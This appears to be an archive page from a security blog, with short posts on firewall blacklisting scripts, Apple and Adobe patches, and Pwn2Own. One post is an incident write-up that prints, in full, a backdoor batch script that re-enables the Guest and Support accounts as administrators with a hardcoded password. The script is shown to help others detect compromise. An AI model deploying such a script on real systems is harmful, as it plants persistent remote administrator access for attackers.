Cloudflare and Dome9 Blacklister Scripts (Bash/Python)
One of my servers was under attack from an IP in China recently (some lame automated SQLi), but I figured I’d blackhole the source IP anyway.
My first step was to blacklist in Dome9, which I use to manage that server’s firewall, but after noticing that the attacks were still hitting my server I remembered that because I also use Cloudflare and those attacks were getting tunnelled through their network. So the solution (for that particular attack) was to also blacklist the source IP in Cloudflare. When another stupid attack came in a day or so later, I did the same and realised that it would be much easier if I automated the whole process.
So I threw together a Bash script (and then a Python script) that leverages the Cloudflare and Dome9 APIs to submit a given IP address to one or both services.
I’ve put these into my scripts repo on GitHub. Simply insert your Cloudflare and/or Dome9 API keys into the configuration portion of the script and go. Using this you could conceivably fully automate it by auto-detecting brute-force type attacks using a script on the server and calling this script to make the blacklist updates.
Bearing in mind these were very hastily put together, any feedback/improvements are welcome!
Malicious Backdoor Batch Script Re-Enables Privileged Guest and Support Accounts on Windows Servers
I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to had been placed in the Administrators and Remote Desktop Users groups (as the server was internet facing). Things got interesting however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.
When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\
1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe
After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.
In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:
@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes
At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321’. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.
These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.
Apple Releases Slew of Security Updates (OSX, Safari, iTunes, iOS 5, aTV)
I wasn’t going to post about last week’s fairly significant iTunes update, but then Apple went and patched a whole bunch of vulnerabilities across the board. Some of these are fairly significant so I thought I would provide a short breakdown of the changes. Either way, you should definitely be patching all of your Apple devices and software tonight.
Hit the jump for a summary of the key vulnerabilities patched in Apple’s security updates.
Browser and Smartphone Exploits Fly at Pwn2Own [Recap]
With Google offering $20,000 for a Chrome sandbox exploit, Apple releasing fresh security updates, and the organisers allowing researchers to target mobile phone basebands, it was sure make for an interesting Pwn2Own contest at CanSecWest this year.
For the fifth year running, Pwn2Own invited security researchers to discover vulnerabilities and develop exploits for the most popular browsers on Mac OS X and Windows (for some reason Linux is left out this year). Traditionally IE, Firefox and Safari have gotten exploited, with Chrome being the last browser standing at last year’s competition. Google upped the ante by making it significantly more attractive to target their browser this year.
In short: Safari, Internet Explorer, iPhone and Blackberry were all successfully compromised. Chrome and Firefox survive. Hit the jump for the full details! Read more
Safari Errorjacking Vulnerability and Exploit [Patched]
One of the vulnerabilities patched in Safari 5.0.4 is a fairly critical issue in WebKit (CVE-2011-0167) that allows Javascript to jump into the local zone, and access any file on the local computer that is accessible to the current user. This could be used by malicious websites to extract files and information from the victim’s computer. The vulnerability affects Safari on Mac OS X and Windows, and could affect other WebKit-based browsers, although Chrome is safe due to added restrictions.
The bug exists because most browser error pages are loaded from the local “file:” zone, a zone that Javascript is not normally allowed to access directly. Since a child browser window remains under the control of the parent, it is possible to cause a child browser window to error, thus entering the normally-restricted local zone, and then instructing the child window to access local files using this elevated local-zone privilege.
This issue was a nice catch, discovered by Aaron Sigel who has a detailed explanation, video demo and proof-of-concept on his blog. It probably goes without saying, but Safari users should run Software Update as soon as possible.
Apple Releases QuickTime 7.6.9 Security Update
Apple has released QuickTime 7.6.9 for Leopard 10.5.8 and Windows (XP,V,7), patching a number of vulnerabilities including several that were fixed in the recent 10.6.5 update.
The vulnerabilities include improper handling of JP2, AVI, MPEG, Flashpix, GIF, PICT, and QTVR files. Viewing maliciously-crafted files can lead to remote code execution in some cases.
QuickTime definitely needs more strengthening. Leopard and Windows users, go forth and patch!
Adobe Reader X Brings Sandboxing with Protected Mode
Adobe recently released Adobe Reader X, the latest incarnation of their PDF viewer software. Over a year after Adobe’s promised ‘security push’ into Reader, and numerous vulnerabilities, exploits and malware, this version finally brings the hotly discussed sandboxing feature.
The sandboxing, or Protected Mode as Adobe call it, would restrict PDFs to an extremely limited running environment. Initially the sandbox will control any write operations attempted by PDFs, to try and prevent malware being written to disk. A later update is expected to bring ‘read’ control as well, to prevent information stealing.
Although this is a good step forward for Adobe Reader, it remains to be seen whether any of their changes will be effective at mitigating vulnerabilities that attempt to read/write directly from memory. It’ll be interesting to see what kinds of vulnerabilities will come out in the coming months.
Either way, Adobe Reader X brings a number of security fixes and improvements, and is thus a recommended update.
Apple Releases Safari 5.0.3 and 4.1.3
Safari updates 5.0.3 and 4.1.3 (for both Mac OS X and Windows) have been released to patch a number of WebKit vulnerabilities, some of which can lead to arbitrary remote code execution.
Fire up your Software Update! Hit the jump for full details of the vulnerabilities fixed.
Safari 5.0.2 Update Fixes WebKit Bugs
Apple has released Safari 5.0.2 and 4.1.2 updates for Mac OS X and Windows which fix issues in both Safari and WebKit (the browser’s rendering engine).
The first issue, which only affects Safari on Windows systems, may lead to code execution if the user attempts to reveal the location of a downloaded file. The other two vulnerabilities include an input validation issue in WebKit’s handling of floating point data types, and a use-after-free issue in WebKit’s handling of elements with run-in styling. Both of these could be used to perform arbitrary code execution.
These two updates should be available in Software Update.
Hit the jump for Apple’s full patch info.